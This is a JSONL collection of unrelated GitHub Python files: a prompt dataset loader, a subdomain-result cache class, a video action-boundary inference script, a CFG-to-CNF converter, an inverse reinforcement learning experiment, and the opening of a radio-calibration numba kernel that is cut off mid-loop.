+{"seq_id":"17244228071","text":"import torch\nimport os\nfrom torch.utils.data import Dataset\n\nfrom torch.distributed import get_rank\nfrom utils import print_rank\nfrom tqdm import tqdm\nimport json\n\n\nclass PromptDataset(Dataset):\n def __init__(self, args, tokenizer, data_path, num=-1):\n super().__init__()\n self.tokenizer = tokenizer\n self.args = args\n self.pad_id = self.tokenizer.eos_token_id\n self.max_prompt_length = args.max_prompt_length\n\n self.data = self.load_data_json(data_path)\n \n if num > 0:\n self.data = self.data[:num]\n \n self.num = min(num, len(self.data)) if num > 0 else len(self.data)\n print_rank(f\"Num instances: {len(self.data)}\")\n \n def __len__(self):\n return self.num\n\n def load_data_json(self, data_path):\n if os.path.exists(os.path.join(data_path, f\"{self.args.data_name}.jsonl\")):\n data_path = os.path.join(data_path, f\"{self.args.data_name}.jsonl\")\n else:\n print_rank(f\"WARNING: {os.path.join(data_path, f'{self.args.data_name}.jsonl')} does not exist\")\n\n with open(data_path) as f:\n lines = f.readlines()\n data_origin = [json.loads(line) for line in lines]\n data = []\n for d in tqdm(data_origin, disable=(get_rank() != 0), desc=\"Loading data\"):\n data.append({\n \"prompt\": d[\"prompt\"].replace(\"\", \"\\n\"),\n \"output\": d[\"output\"]\n })\n return data\n\n def __getitem__(self, index: int):\n data = self.data[index]\n\n output = data[\"output\"]\n prompt = data[\"prompt\"]\n \n return index, prompt, output\n \n def collate(self, samples): \n prompt_batch = [sample[1] for sample in samples]\n prompt_ids = self.tokenizer.batch_encode_plus(prompt_batch, \n return_tensors=\"pt\", \n max_length=self.max_prompt_length, \n truncation=True, \n padding='max_length',\n return_token_type_ids=False,)\n \n answer_batch = [sample[2] for sample in samples]\n indices = [sample[0] for sample in samples]\n \n return indices, prompt_ids, answer_batch\n\n def move_to_device(self, prompt_ids, device):\n for t in prompt_ids:\n if torch.is_tensor(prompt_ids[t]):\n prompt_ids[t] = prompt_ids[t].to(device)","repo_name":"yining610/in-context-generalization","sub_path":"data_utils/prompt_datasets.py","file_name":"prompt_datasets.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"21472749270","text":"from dataclasses import dataclass, field\nfrom src.interfaces.singleton import Singleton\n\n@dataclass\nclass EnumerationReporte(metaclass=Singleton):\n \"\"\"Cache results to use in real time execution\n \"\"\"\n \n report_subdomains: list = field(init=False, default_factory=list)\n \n def add(self, subdomain) -> None:\n self.report_subdomains.extend(subdomain)","repo_name":"deidax/dosuby","sub_path":"src/core/domain/enumeration_reporte.py","file_name":"enumeration_reporte.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"7462314759","text":"import argparse\nimport random\nimport collections\nimport itertools\nfrom collections import deque\nfrom operator import itemgetter\nimport os\nimport cv2\nimport mmcv\nimport numpy as np\nimport torch\nimport json\nfrom mmcv.parallel import collate, scatter\n\nfrom mmaction.apis import init_recognizer\nfrom mmaction.datasets.pipelines import Compose\nfrom mmaction.core import OutputHook\nfrom SoccerNet.utils import getListGames\nfrom SoccerNet.DataLoader import Frame, FrameCV\n\nFONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL\nFONTSCALE = 1\nFONTCOLOR = (255, 255, 255) # BGR, white\nMSGCOLOR = (128, 128, 128) # BGR, gray\nTHICKNESS = 1\nLINETYPE = 1\n\nEXCLUED_STEPS = [\n 'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',\n 'PyAVDecode', 'RawFrameDecode', 'FrameSelector'\n]\n\nclass sliceable_deque(collections.deque):\n def __getitem__(self, index):\n if isinstance(index, slice):\n return type(self)(itertools.islice(self, index.start,\n index.stop, index.step))\n return collections.deque.__getitem__(self, index)\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='MMAction2 predict different labels in a long video demo')\n parser.add_argument('config', help='test config file path')\n parser.add_argument('checkpoint', help='checkpoint file/url')\n parser.add_argument(\n '--device', type=str, default='cuda:0', help='CPU/CUDA device option')\n parser.add_argument(\n '--split',\n type=str,\n default=\"val\",\n help='val/test')\n parser.add_argument(\n '--bias',\n type=int,\n default=1000,\n help='classify temporal bias')\n parser.add_argument(\n '--half',\n type=int,\n default=0,\n help='0: 1st part, 1: second part, 2:third part, 3:forth part') # 4 parts\n\n parser.add_argument(\n '--datapath',\n type=str,\n default=\"data/loveu_wide_val_2s_30fps/\",\n help='loveu val data path')\n parser.add_argument(\n '--targetpath',\n type=str,\n default=\"data/valres/\",\n help='target path')\n parser.add_argument(\n '--modelname',\n type=str,\n default=\"csn_4cls_2s_30fps\",\n help='pth model name')\n parser.add_argument(\n '--fps',\n type=float,\n default=30.0,\n help=('fps'))\n parser.add_argument(\n '--stride',\n type=int,\n default=8,\n help='stride')\n args = parser.parse_args()\n return args\n\ndef bmn_proposals(results,\n num_videos,\n max_avg_proposals=None,\n num_res = 1,\n thres=0.0,\n ):\n\n bmn_res = []\n for result in results:\n #video_id = result['video_name']\n num_proposals = 0\n cur_video_proposals = []\n for proposal in result:\n t_start, t_end = proposal['segment']\n score = proposal['score']\n if score < thres: continue\n cur_video_proposals.append([t_start, t_end, score])\n num_proposals += 1\n if len(cur_video_proposals)==0: \n bmn_res.append(np.array([-2021]))\n continue\n cur_video_proposals = np.array(cur_video_proposals)\n\n ratio = (max_avg_proposals * float(num_videos) / num_proposals)\n\n this_video_proposals = cur_video_proposals[:, :2]\n sort_idx = cur_video_proposals[:, 2].argsort()[::-1]\n this_video_proposals = this_video_proposals[sort_idx, :].astype(np.float32)\n\n if this_video_proposals.ndim != 2:\n this_video_proposals = np.expand_dims(this_video_proposals, axis=0)\n\n # For each video, compute temporal_iou scores among the retrieved proposals\n total_num_retrieved_proposals = 0\n # Sort proposals by score\n num_retrieved_proposals = np.minimum(\n int(this_video_proposals.shape[0] * ratio),\n this_video_proposals.shape[0])\n total_num_retrieved_proposals += num_retrieved_proposals\n this_video_proposals = this_video_proposals[:num_retrieved_proposals, :]\n \n #print(this_video_proposals)\n this_video_gebd_proposals = this_video_proposals.mean(axis=-1)\n num_res = min(num_res, len(this_video_gebd_proposals))\n this_video_gebd_top_proposal = this_video_gebd_proposals[:num_res]\n\n bmn_res.append(this_video_gebd_top_proposal)\n return bmn_res\n\n\ndef show_results(model, data, test, cn, args):\n frame_queue = sliceable_deque(maxlen=args.sample_length)\n result_queue = deque(maxlen=1)\n result_path = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_score.npy\"\n # save results with different scores\n result_bmn_path = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal.npy\"\n\n result_bmn_path_3 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.3.npy\"\n result_bmn_path_4 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.4.npy\"\n result_bmn_path_5 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.5.npy\"\n result_bmn_path_6 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.6.npy\"\n result_bmn_path_7 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.7.npy\"\n result_bmn_path_8 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.8.npy\"\n result_bmn_path_9 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.9.npy\"\n result_bmn_path_95 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.95.npy\"\n\n videoLoader = FrameCV(args.datapath + '/' + test, FPS=args.fps, transform=\"resize256\", start=None, duration=None)\n frames = videoLoader.frames[:, :, :, ::-1]\n print(cn, test, frames.shape)\n\n duration = videoLoader.time_second\n\n stride = args.stride\n pad_length = int(args.sample_length/2)\n frames_head = np.zeros((pad_length, frames.shape[1], frames.shape[2], frames.shape[3]), frames.dtype)\n frames_tail = np.zeros((pad_length, frames.shape[1], frames.shape[2], frames.shape[3]), frames.dtype)\n for i in range(pad_length):\n frames_head[i] = frames[0].copy()\n frames_tail[i] = frames[-1].copy()\n frames_padded = np.concatenate((frames_head, frames, frames_tail), 0)\n\n score_list = []\n bmn_results = []\n num_sub_videos = 0\n for i in range(int(frames.shape[0]/stride)):\n num_sub_videos += 1\n start_index = i * stride\n frame_queue = frames_padded[(start_index):(start_index + args.sample_length)][0::data['frame_interval']].copy()\n ret, scores, output_bmn = inference(model, data, args, frame_queue)\n score_list.append(scores)\n bmn_results.append(output_bmn)\n bmn_res = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.0,\n )\n\n score_list = np.array(score_list)\n bmn_res = np.array(bmn_res)\n\n bmn_res3 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.3,\n )\n bmn_res3 = np.array(bmn_res3)\n\n bmn_res4 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.4,\n )\n bmn_res4 = np.array(bmn_res4)\n\n bmn_res5 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.5,\n )\n bmn_res5 = np.array(bmn_res5)\n\n bmn_res6 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.6,\n )\n bmn_res6 = np.array(bmn_res6)\n\n bmn_res7 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.7,\n )\n bmn_res7 = np.array(bmn_res7)\n\n bmn_res8 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.8,\n )\n bmn_res8 = np.array(bmn_res8)\n\n bmn_res9 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.9,\n )\n bmn_res9 = np.array(bmn_res9)\n\n bmn_res95 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.95,\n )\n bmn_res95 = np.array(bmn_res95)\n\n score_list = np.array(score_list)\n bmn_res = np.array(bmn_res)\n #print(cn, test, frames.shape, score_list.shape)\n np.save(result_path, score_list)\n np.save(result_bmn_path, bmn_res)\n np.save(result_bmn_path_3, bmn_res3)\n np.save(result_bmn_path_4, bmn_res4)\n np.save(result_bmn_path_5, bmn_res5)\n np.save(result_bmn_path_6, bmn_res6)\n np.save(result_bmn_path_7, bmn_res7)\n np.save(result_bmn_path_8, bmn_res8)\n np.save(result_bmn_path_9, bmn_res9)\n np.save(result_bmn_path_95, bmn_res95)\n print(cn, result_path, \"saved\")\n\ndef inference(model, data, args, frame_queue):\n cur_windows = list(frame_queue)\n if data['img_shape'] is None:\n data['img_shape'] = frame_queue[0].shape[:2]\n cur_data = data.copy()\n cur_data['imgs'] = cur_windows\n cur_data = args.test_pipeline(cur_data)\n cur_data = collate([cur_data], samples_per_gpu=1)\n if next(model.parameters()).is_cuda:\n cur_data = scatter(cur_data, [args.device])[0]\n with torch.no_grad():\n scores, output_bmn = model(return_loss=False, **cur_data)\n return True, scores[0], output_bmn[0]\n\ndef main():\n args = parse_args()\n\n args.device = torch.device(args.device)\n model = init_recognizer(args.config, args.checkpoint, device=args.device)\n data = dict(img_shape=None, modality='RGB', label=-1)\n\n # prepare test pipeline from non-camera pipeline\n cfg = model.cfg\n sample_length = 0\n pipeline = cfg.test_pipeline\n pipeline_ = pipeline.copy()\n for step in pipeline:\n if 'SampleFrames' in step['type']:\n sample_length = step['clip_len'] * step['frame_interval']\n data['frame_interval'] = step['frame_interval']\n data['num_clips'] = step['num_clips']\n data['clip_len'] = step['clip_len']\n pipeline_.remove(step)\n if step['type'] in EXCLUED_STEPS:\n # remove step to decode frames\n pipeline_.remove(step)\n test_pipeline = Compose(pipeline_)\n\n assert sample_length > 0\n args.sample_length = sample_length\n args.test_pipeline = test_pipeline\n\n tests = []\n videos = os.listdir(args.datapath)\n for video in videos:\n video_path = video\n tests.append(video_path)\n\n num_split = 4\n if args.stride == 2:\n num_split = 16\n if args.stride == 4:\n num_split = 6\n if args.stride == 8:\n num_split = 8\n if args.stride == 16:\n num_split = 16\n\n quater_len = int(len(tests)/num_split)\n\n if args.half != num_split-1:\n tests = tests[(args.half*quater_len):((args.half+1)*quater_len)]\n else:\n tests = tests[(args.half*quater_len):]\n\n cn = 0\n for test in tests:\n cn += 1\n if not os.path.exists(args.targetpath + test.split(\".\")[0]):\n os.makedirs(args.targetpath + test.split(\".\")[0], exist_ok=True)\n show_results(model, data, test, cn, args)\n \nif __name__ == '__main__':\n main()\n\n","repo_name":"VisualAnalysisOfHumans/LOVEU_TRACK1_TOP3_SUBMISSION","sub_path":"Track1.2/inference/long_video_demo_extractor_bmn.py","file_name":"long_video_demo_extractor_bmn.py","file_ext":"py","file_size_in_byte":12359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31055990121","text":"from os import close\nfrom copy import deepcopy\nimport sys\n\nglobal cfg\ncfg = {}\ncnf = {}\nLHS = []\nRHS = []\nEPS = []\nVAR = 'FX'\nglobal count\ncount = 0\nglobal panggil\npanggil = False\n\ndef readCFG(filename):\n with open(filename) as file:\n lines = file.readlines()\n lines = [line.strip() for line in lines]\n file.close()\n for line in lines:\n if(line == \"\"):\n pass\n else:\n a,b = line.split('->')\n a = a.strip()\n b = b.strip().split('|')\n LHS.append(a)\n RHS.append(b)\n for i in range(len(b)):\n b[i] = b[i].split()\n cfg[a] = b\n#MEMBACA CFG LALU MENYIMPANNYA DI DICTIONARY DENGAN FORMAT:\n#{LHS : [[RHS]]}\n#CONTOH : \n#{'S' : [['ACTION','VAR'],['OPS','VALUE']]}\n\ndef retCFG():\n return cfg\n\ndef retCNF():\n return cnf\n\ndef retEPS():\n return EPS\n\ndef STARTSTATE(): #MENAMBAH START STATE DI AWAL\n global panggil\n if(isCalledinRHS(LHS[0])):\n cnf[\"S0\"] = [[LHS[0]]]\n LHS.insert(0,\"S0\")\n RHS.insert(0,[[LHS[1]]])\n panggil = True\n else:\n LHS[0] = \"S0\"\n assignNewdict()\n cnf.update(cfg)\n\ndef uselessRemovalSTATE():\n bal = 0 #AGAR INDEX TETAP VALID SETELAH PENGHAPUSAN SUATU ELEMEN\n for i in range(len(LHS)): #MENGHILANGKAN NON TERMINAL YANG TIDAK PERNAH TERCAPAI\n if(not isCalledinRHS(LHS[i-bal]) and LHS[i-bal] != LHS[0]):\n delCont = cnf[LHS[i-bal]]\n del cnf[LHS[i-bal]]\n LHS.remove(LHS[i-bal])\n RHS.remove(delCont)\n bal += 1\n \n #MENGHILANGKAN UNIT PRODUCTION\n for i in range(len(LHS)):\n right = cnf[LHS[i]]\n n = len(right)\n j=0\n while(j1):\n for k in j:\n if(k not in LHS): \n singleVar = containSingleTerminal(k)\n if(singleVar == ''):\n new = VAR + str(count)\n cnf[new] = [[k]]\n k = new\n LHS.append(new)\n RHS.append(cnf[new])\n updateRHS(LHS[i],j,cnf[new][0][0],new)\n count += 1\n else:\n updateRHS(LHS[i],j,k,singleVar)\n assignNewdict()\n \n\n \ndef subMoreThan2():\n global count\n idx = 0\n for i in cnf:\n right = cnf[i]\n for j in range(len(right)):\n if(len(right[j])>2): #KALO ADA YANG LEBIH DARI 2 VAR BUAT SATU RULE BAKAL DISUBSTITUSI\n k = 0\n balance = 0\n while(len(right[j])>2): #BAKAL DILAKUIN SEBANYAK VARIABLE DIV 2\n tmp = []\n #print(RHS[idx][j],k)\n tmp.append(right[j][k-balance])\n tmp.append(right[j][k+1-balance])\n if(not isExistInRHS(tmp)):\n RHS.append([[right[j][k-balance]]])\n panj = len(RHS)\n RHS[panj-1][0].append(right[j][k+1-balance])\n newVar = VAR + str(count) \n right[j].remove(right[j][k+1-balance])\n right[j].remove(right[j][k-balance])\n right[j].insert(k-balance,newVar)\n LHS.append(newVar)\n RHS[idx][j] = right[j]\n count += 1\n else:\n right[j].remove(right[j][k+1-balance])\n right[j].remove(right[j][k-balance])\n tmp2 = retLHSFromRHS(tmp)\n right[j].insert(k-balance,tmp2)\n k += 1\n balance += 1\n #print(RHS[idx][j])\n \n idx+=1\n assignNewdict()\n \ndef isExistInRHS(right):\n for i in RHS:\n if (len(i) == 1 and right in i):\n return True\n return False\n\ndef retLHSFromRHS(right):\n for i in range(len(RHS)):\n if (len(RHS[i]) == 1 and right in RHS[i]):\n return LHS[i]\n return None\ndef isCallingItself(left):\n right = cnf[left]\n for i in right:\n if(len(i) == 1 and i[0] == left):\n return True\n else:\n return False\n\ndef isCalledinRHS(left):\n for i in RHS:\n for j in i:\n if (left in j):\n return True\n return False\n\ndef isSoloProduced(left):\n right = cnf[left]\n if (len(right)>1):\n return False\n else:\n return True\n\n\n#FUNGSI TAMBAHAN YANG DIPERLUKAN UNTUK MENCARI TERMINAL DAN VARIABEL YANG BERSEBELAHAN\ndef isContainLHS(arr):\n for i in arr:\n if(i in LHS):\n return True\n return False\n\ndef isContainRHS(arr):\n for i in arr:\n if(i not in LHS):\n return True\n return False\n\n#MENGHAPUS VALUE PADA LHS DAN RHS\ndef delRandL(string):\n found = False\n i = 0\n while(not found):\n if(LHS[i] == string):\n found = True\n delCont = cnf[LHS[i]]\n LHS.remove(LHS[i])\n RHS.remove(delCont)\n else:\n i += 1\n\ndef updateRHS(left,right,val,val2):\n found = False\n i = 0\n while(not found):\n if(LHS[i] == left):\n count = 0\n for j in RHS[i]:\n if (j == right):\n count2 = 0\n for k in j:\n if(k==val):\n RHS[i][count][count2] = val2\n count2 += 1\n found = True\n count += 1\n i += 1\n\ndef containSingleTerminal(X):\n for i in cnf:\n right = cnf[i]\n for j in right:\n if(len(j)==1 and j[0] == X and len(right) == 1):\n return i\n return ''\n\ndef assignNewdict():\n cnf.clear()\n for i in range(len(LHS)):\n cnf[LHS[i]] = RHS[i]\n\ndef writeToFile():\n write = ''\n for i in range(len(LHS)):\n write += LHS[i] + ' -> '\n for j in range(len(RHS[i])):\n for k in range(len(RHS[i][j])):\n write += ' '+ RHS[i][j][k] + ' '\n if(j != len(RHS[i])-1):\n write += \"|\"\n write += \"\\n\"\n f = open(\"cnf_out.txt\",\"w\")\n f.write(write)\n f.close()\n\ndef printCNF():\n write = ''\n for i in range(len(LHS)):\n write += LHS[i] + ' -> '\n for j in range(len(RHS[i])):\n for k in range(len(RHS[i][j])):\n write += ' '+ RHS[i][j][k] + ' '\n if(j != len(RHS[i])-1):\n write += \"|\"\n write += \"\\n\"\n print(write)\n\nif(__name__ == '__main__'):\n if(len(sys.argv)>1):\n try:\n readCFG(sys.argv[1])\n except:\n print(\"File Tidak ditemukan!\")\n sys.exit()\n STARTSTATE()\n uselessRemovalSTATE()\n eliminateTerminal()\n subMoreThan2()\n writeToFile()\n print(\"CFG telah berhasil diconvert ke CNF!\")","repo_name":"IMYELI/Tubes-TBFO-Python-Syntax-Evaluation","sub_path":"cfgConv.py","file_name":"cfgConv.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6204753212","text":"import os\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nfrom sklearn.externals import joblib\nfrom sklearn.neural_network import MLPRegressor\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom tensorflow.python import keras as K\nimport gym\nfrom gym.envs.registration import register\nregister(id=\"FrozenLakeEasy-v0\", entry_point=\"gym.envs.toy_text:FrozenLakeEnv\",\n kwargs={\"is_slippery\": False})\n\n\ntfe.enable_eager_execution()\n\n\nclass TeacherAgent():\n\n def __init__(self, env, epsilon=0.1):\n self.actions = list(range(env.action_space.n))\n self.num_states = env.observation_space.n\n self.epsilon = epsilon\n self.model = None\n\n def save(self, model_path):\n joblib.dump(self.model, model_path)\n\n @classmethod\n def load(cls, env, model_path, epsilon=0.1):\n agent = cls(env, epsilon)\n agent.model = joblib.load(model_path)\n return agent\n\n def initialize(self, state):\n # Only state => action projection is needed\n self.model = MLPRegressor(hidden_layer_sizes=(), max_iter=1)\n # Warmup to use predict method\n dummy_label = [np.random.uniform(size=len(self.actions))]\n self.model.partial_fit(np.array([self.transform(state)]),\n np.array(dummy_label))\n return self\n\n def estimate(self, state):\n feature = self.transform(state)\n q = self.model.predict([feature])[0]\n return q\n\n def policy(self, state):\n if np.random.random() < self.epsilon:\n return np.random.randint(len(self.actions))\n else:\n return np.argmax(self.estimate(state))\n\n def transform(self, state):\n feature = np.zeros(self.num_states)\n feature[state] = 1.0\n return feature\n\n @classmethod\n def train(cls, env, episode_count=3000, gamma=0.9,\n initial_epsilon=1.0, final_epsilon=0.1, report_interval=100):\n agent = cls(env, initial_epsilon).initialize(env.reset())\n rewards = []\n decay = (initial_epsilon - final_epsilon) / episode_count\n for e in range(episode_count):\n s = env.reset()\n done = False\n goal_reward = 0\n while not done:\n a = agent.policy(s)\n estimated = agent.estimate(s)\n\n n_state, reward, done, info = env.step(a)\n\n gain = reward + gamma * max(agent.estimate(n_state))\n estimated[a] = gain\n agent.model.partial_fit([agent.transform(s)], [estimated])\n s = n_state\n else:\n goal_reward = reward\n\n rewards.append(goal_reward)\n if e != 0 and e % report_interval == 0:\n recent = np.array(rewards[-report_interval:])\n print(\"At episode {}, reward is {}\".format(\n e, recent.mean()))\n agent.epsilon -= decay\n\n return agent\n\n\nclass IRL():\n\n def __init__(self, env):\n self.actions = list(range(env.action_space.n))\n self.num_states = env.observation_space.n\n self.rewards = tfe.Variable(tf.random_uniform(\n [env.observation_space.n]),\n name=\"rewards\")\n \"\"\"\n self.rewards = tfe.Variable(initial_value=[0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0,],\n name=\"rewards\")\n \"\"\"\n self._updater = tfe.implicit_gradients(self.loss)\n\n \"\"\"\n def value_estimate(self, steps, gamma):\n values = {}\n counts = {}\n for i, t in enumerate(steps):\n rewards = [self.rewards[s] for s in t]\n for j, s in enumerate(t):\n discounteds = [r * (gamma ** k)\n for k, r in enumerate(rewards[j:])]\n discounted = tf.reduce_sum(discounteds)\n if s not in values:\n values[s] = discounted\n counts[s] = 0.0\n\n counts[s] += 1\n values[s] = tf.add(values[s], tf.divide(\n tf.subtract(discounted, values[s]),\n counts[s]))\n\n value_tensors = []\n total_count = sum([counts[s] for s in counts])\n for i in range(self.rewards.shape[0].value):\n if i in values:\n visit = counts[i] / total_count\n value = tf.multiply(values[i], visit)\n else:\n value = tf.constant(0.0)\n value_tensors.append(value)\n values = tf.stack(value_tensors)\n return values\n \"\"\"\n\n def value_estimate(self, trajectory, gamma):\n values = {}\n one_host_trajectory = tf.one_hot(trajectory, self.num_states)\n rewards = tf.reduce_sum(one_host_trajectory * self.rewards, axis=1)\n for i, r in enumerate(rewards):\n future = [_r * (gamma ** (k + 1))\n for k, _r in enumerate(rewards[(i + 1):])]\n reward = r + tf.reduce_sum(future)\n s = trajectory[i]\n values[s] = reward\n\n value_tensors = []\n for i in range(self.num_states):\n if i in values:\n value = values[i]\n else:\n value = tf.constant(0.0)\n value_tensors.append(value)\n values = tf.stack(value_tensors)\n return values\n\n def get_rewards(self):\n return self.rewards.numpy()\n\n def loss(self, teacher_steps, steps, gamma):\n teacher_values = tf.stack([self.value_estimate(t, gamma) for t in teacher_steps])\n values = tf.stack([self.value_estimate(t, gamma) for t in steps])\n best = tf.reduce_mean(teacher_values, axis=0)\n diff = tf.reduce_min(best - values, axis=0)\n #print(\">>>>>>>>\")\n #print(tf.reshape(best, (4, 4)))\n #print(tf.reshape(tf.reduce_mean(values, axis=0), (4, 4)))\n\n loss = tf.reduce_sum(tf.boolean_mask(diff, diff > 0))\n penalty = -2 * tf.reduce_sum(tf.boolean_mask(diff, diff < 0))\n loss += penalty\n\n #_loss = _loss + 1.5 * tf.reduce_sum(tf.abs(self.rewards))\n return loss\n\n def update(self, optimizer, teacher_steps, steps, gamma):\n loss = self.loss(teacher_steps, steps, gamma)\n optimizer.apply_gradients(self._updater(teacher_steps, steps, gamma))\n return loss, self.get_rewards()\n\n def take_action(self, Q, state, actions, epsilon=0.1):\n rand_action = np.random.randint(len(actions))\n if np.random.random() < epsilon:\n return rand_action\n elif state in Q and sum(Q[state]) != 0:\n return np.argmax(Q[state])\n else:\n return rand_action\n\n def estimate(self, env, teacher, episode_count=3000,\n teacher_demo_size=256, batch_size=32,\n learning_rate=1e-3, max_step=10,\n gamma=0.9, report_interval=10):\n\n # Accumulate teacher's demonstration\n demos = []\n for e in range(teacher_demo_size):\n s = env.reset()\n done = False\n trajectory = [s]\n while not done:\n a = teacher.policy(s)\n n_state, reward, done, info = env.step(a)\n s = n_state\n trajectory.append(s)\n demos.append(trajectory)\n\n print(\"Start reward estimation.\")\n actions = list(range(env.action_space.n))\n rewards = np.zeros((env.observation_space.n))\n Q = defaultdict(lambda: [0] * len(actions))\n optimizer = tf.train.AdamOptimizer(learning_rate)\n\n for e in range(episode_count):\n batch = []\n total_reward = 0\n for b in range(batch_size):\n s = env.reset()\n done = False\n trajectory = [s]\n step = 0\n epsilon = 1.0\n while not done and step < max_step:\n a = self.take_action(Q, s, actions, epsilon)\n n_state, reward, done, info = env.step(a)\n\n estimated = Q[s][a]\n gain = rewards[n_state] + gamma * max(Q[n_state])\n Q[s][a] += learning_rate * (gain - estimated)\n s = n_state\n trajectory.append(s)\n step += 1\n epsilon = epsilon * ((batch_size - b) / batch_size)\n else:\n total_reward += reward\n batch.append(trajectory)\n\n teacher_batch = np.random.choice(demos, size=batch_size)\n loss, new_rewards = self.update(optimizer,\n teacher_batch, batch, gamma)\n\n rewards = new_rewards\n\n if e % 10 == 0:\n print(\"At episode {}, reward={}, loss={}\".format(\n e, total_reward, loss))\n print(\"Reward\")\n print(new_rewards.reshape(4, 4))\n\n\ndef main(train):\n env = gym.make(\"FrozenLakeEasy-v0\")\n path = os.path.join(os.path.dirname(__file__), \"irl_teacher.pkl\")\n\n if train:\n agent = TeacherAgent.train(env)\n agent.save(path)\n else:\n teacher = TeacherAgent.load(env, path)\n irl = IRL(env)\n irl.estimate(env, teacher)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Imitation Learning\")\n parser.add_argument(\"--train\", action=\"store_true\",\n help=\"train teacher model\")\n\n args = parser.parse_args()\n main(args.train)\n","repo_name":"icoxfog417/baby-steps-of-rl-ja","sub_path":"IRL/backups/irl_from_traj.py","file_name":"irl_from_traj.py","file_ext":"py","file_size_in_byte":9805,"program_lang":"python","lang":"en","doc_type":"code","stars":403,"dataset":"github-code","pt":"71"}
+{"seq_id":"72680787749","text":"# CubiCal: a radio interferometric calibration suite\n# (c) 2017 Rhodes University & Jonathan S. Kenyon\n# http://github.com/ratt-ru/CubiCal\n# This code is distributed under the terms of GPLv2, see LICENSE.md for details\n\"\"\"\nCython kernels for the phase-only gain machine. Functions require output arrays to be \nprovided. Common dimensions of arrays are:\n\n+----------------+------+\n| Dimension | Size |\n+================+======+\n| Direction | d |\n+----------------+------+\n| Model | m |\n+----------------+------+\n| Time | t |\n+----------------+------+\n| Time Intervals | ti |\n+----------------+------+\n| Frequency | f |\n+----------------+------+\n| Freq Intervals | fi |\n+----------------+------+\n| Antenna | a |\n+----------------+------+\n| Correlation | c |\n+----------------+------+\n\n\"\"\"\nfrom builtins import range\n\nimport numpy as np\nfrom numba import jit, prange\n\nimport cubical.kernels\nfrom cubical.kernels import generics\nfrom cubical.kernels import full_complex\nfrom cubical.kernels import diag_complex\n\nuse_parallel = True if cubical.kernels.num_omp_threads > 1 else False\nuse_cache = cubical.kernels.use_cache\n\nallocate_vis_array = full_complex.allocate_vis_array\nallocate_gain_array = full_complex.allocate_gain_array\nallocate_flag_array = full_complex.allocate_flag_array\nallocate_param_array = full_complex.allocate_param_array\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_jhj(m, jhj, t_int=1, f_int=1):\n \"\"\"\n Given the model array, computes the diagonal entries of J\\ :sup:`H`\\J. J\\ :sup:`H`\\J is computed\n over intervals. This is an approximation of the Hessian. In the phase-only case, this\n approximation does not depend on the gains, therefore it does not vary with iteration.\n\n Args:\n m (np.complex64 or np.complex128):\n Typed memoryview of model array with dimensions (d, m, t, f, a, a, c, c).\n jhj (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H`\\J array with dimensions (d, ti, fi, a, c, c). Must be zero-filled.\n t_int (int):\n Number of time slots per solution interval.\n f_int (int):\n Number of frequencies per solution interval.\n \"\"\"\n\n n_dir = m.shape[0]\n n_mod = m.shape[1]\n n_tim = m.shape[2]\n n_fre = m.shape[3]\n n_ant = m.shape[4]\n\n all_bls = np.array([[i,j] for i in range(n_ant) for j in range(n_ant) if i!=j])\n n_bl = all_bls.shape[0]\n\n broadcast_times = np.array([t//t_int for t in range(n_tim)])\n broadcast_freqs = np.array([f//f_int for f in range(n_fre)])\n\n for ibl in prange(n_bl):\n aa, ab = all_bls[ibl,0], all_bls[ibl,1]\n for i in range(n_mod):\n for t in range(n_tim):\n bt = broadcast_times[t]\n for f in range(n_fre):\n bf = broadcast_freqs[f]\n for d in range(n_dir):\n\n m00 = m[d,i,t,f,aa,ab,0,0]\n m01 = m[d,i,t,f,aa,ab,0,1]\n m10 = m[d,i,t,f,aa,ab,1,0]\n m11 = m[d,i,t,f,aa,ab,1,1]\n\n 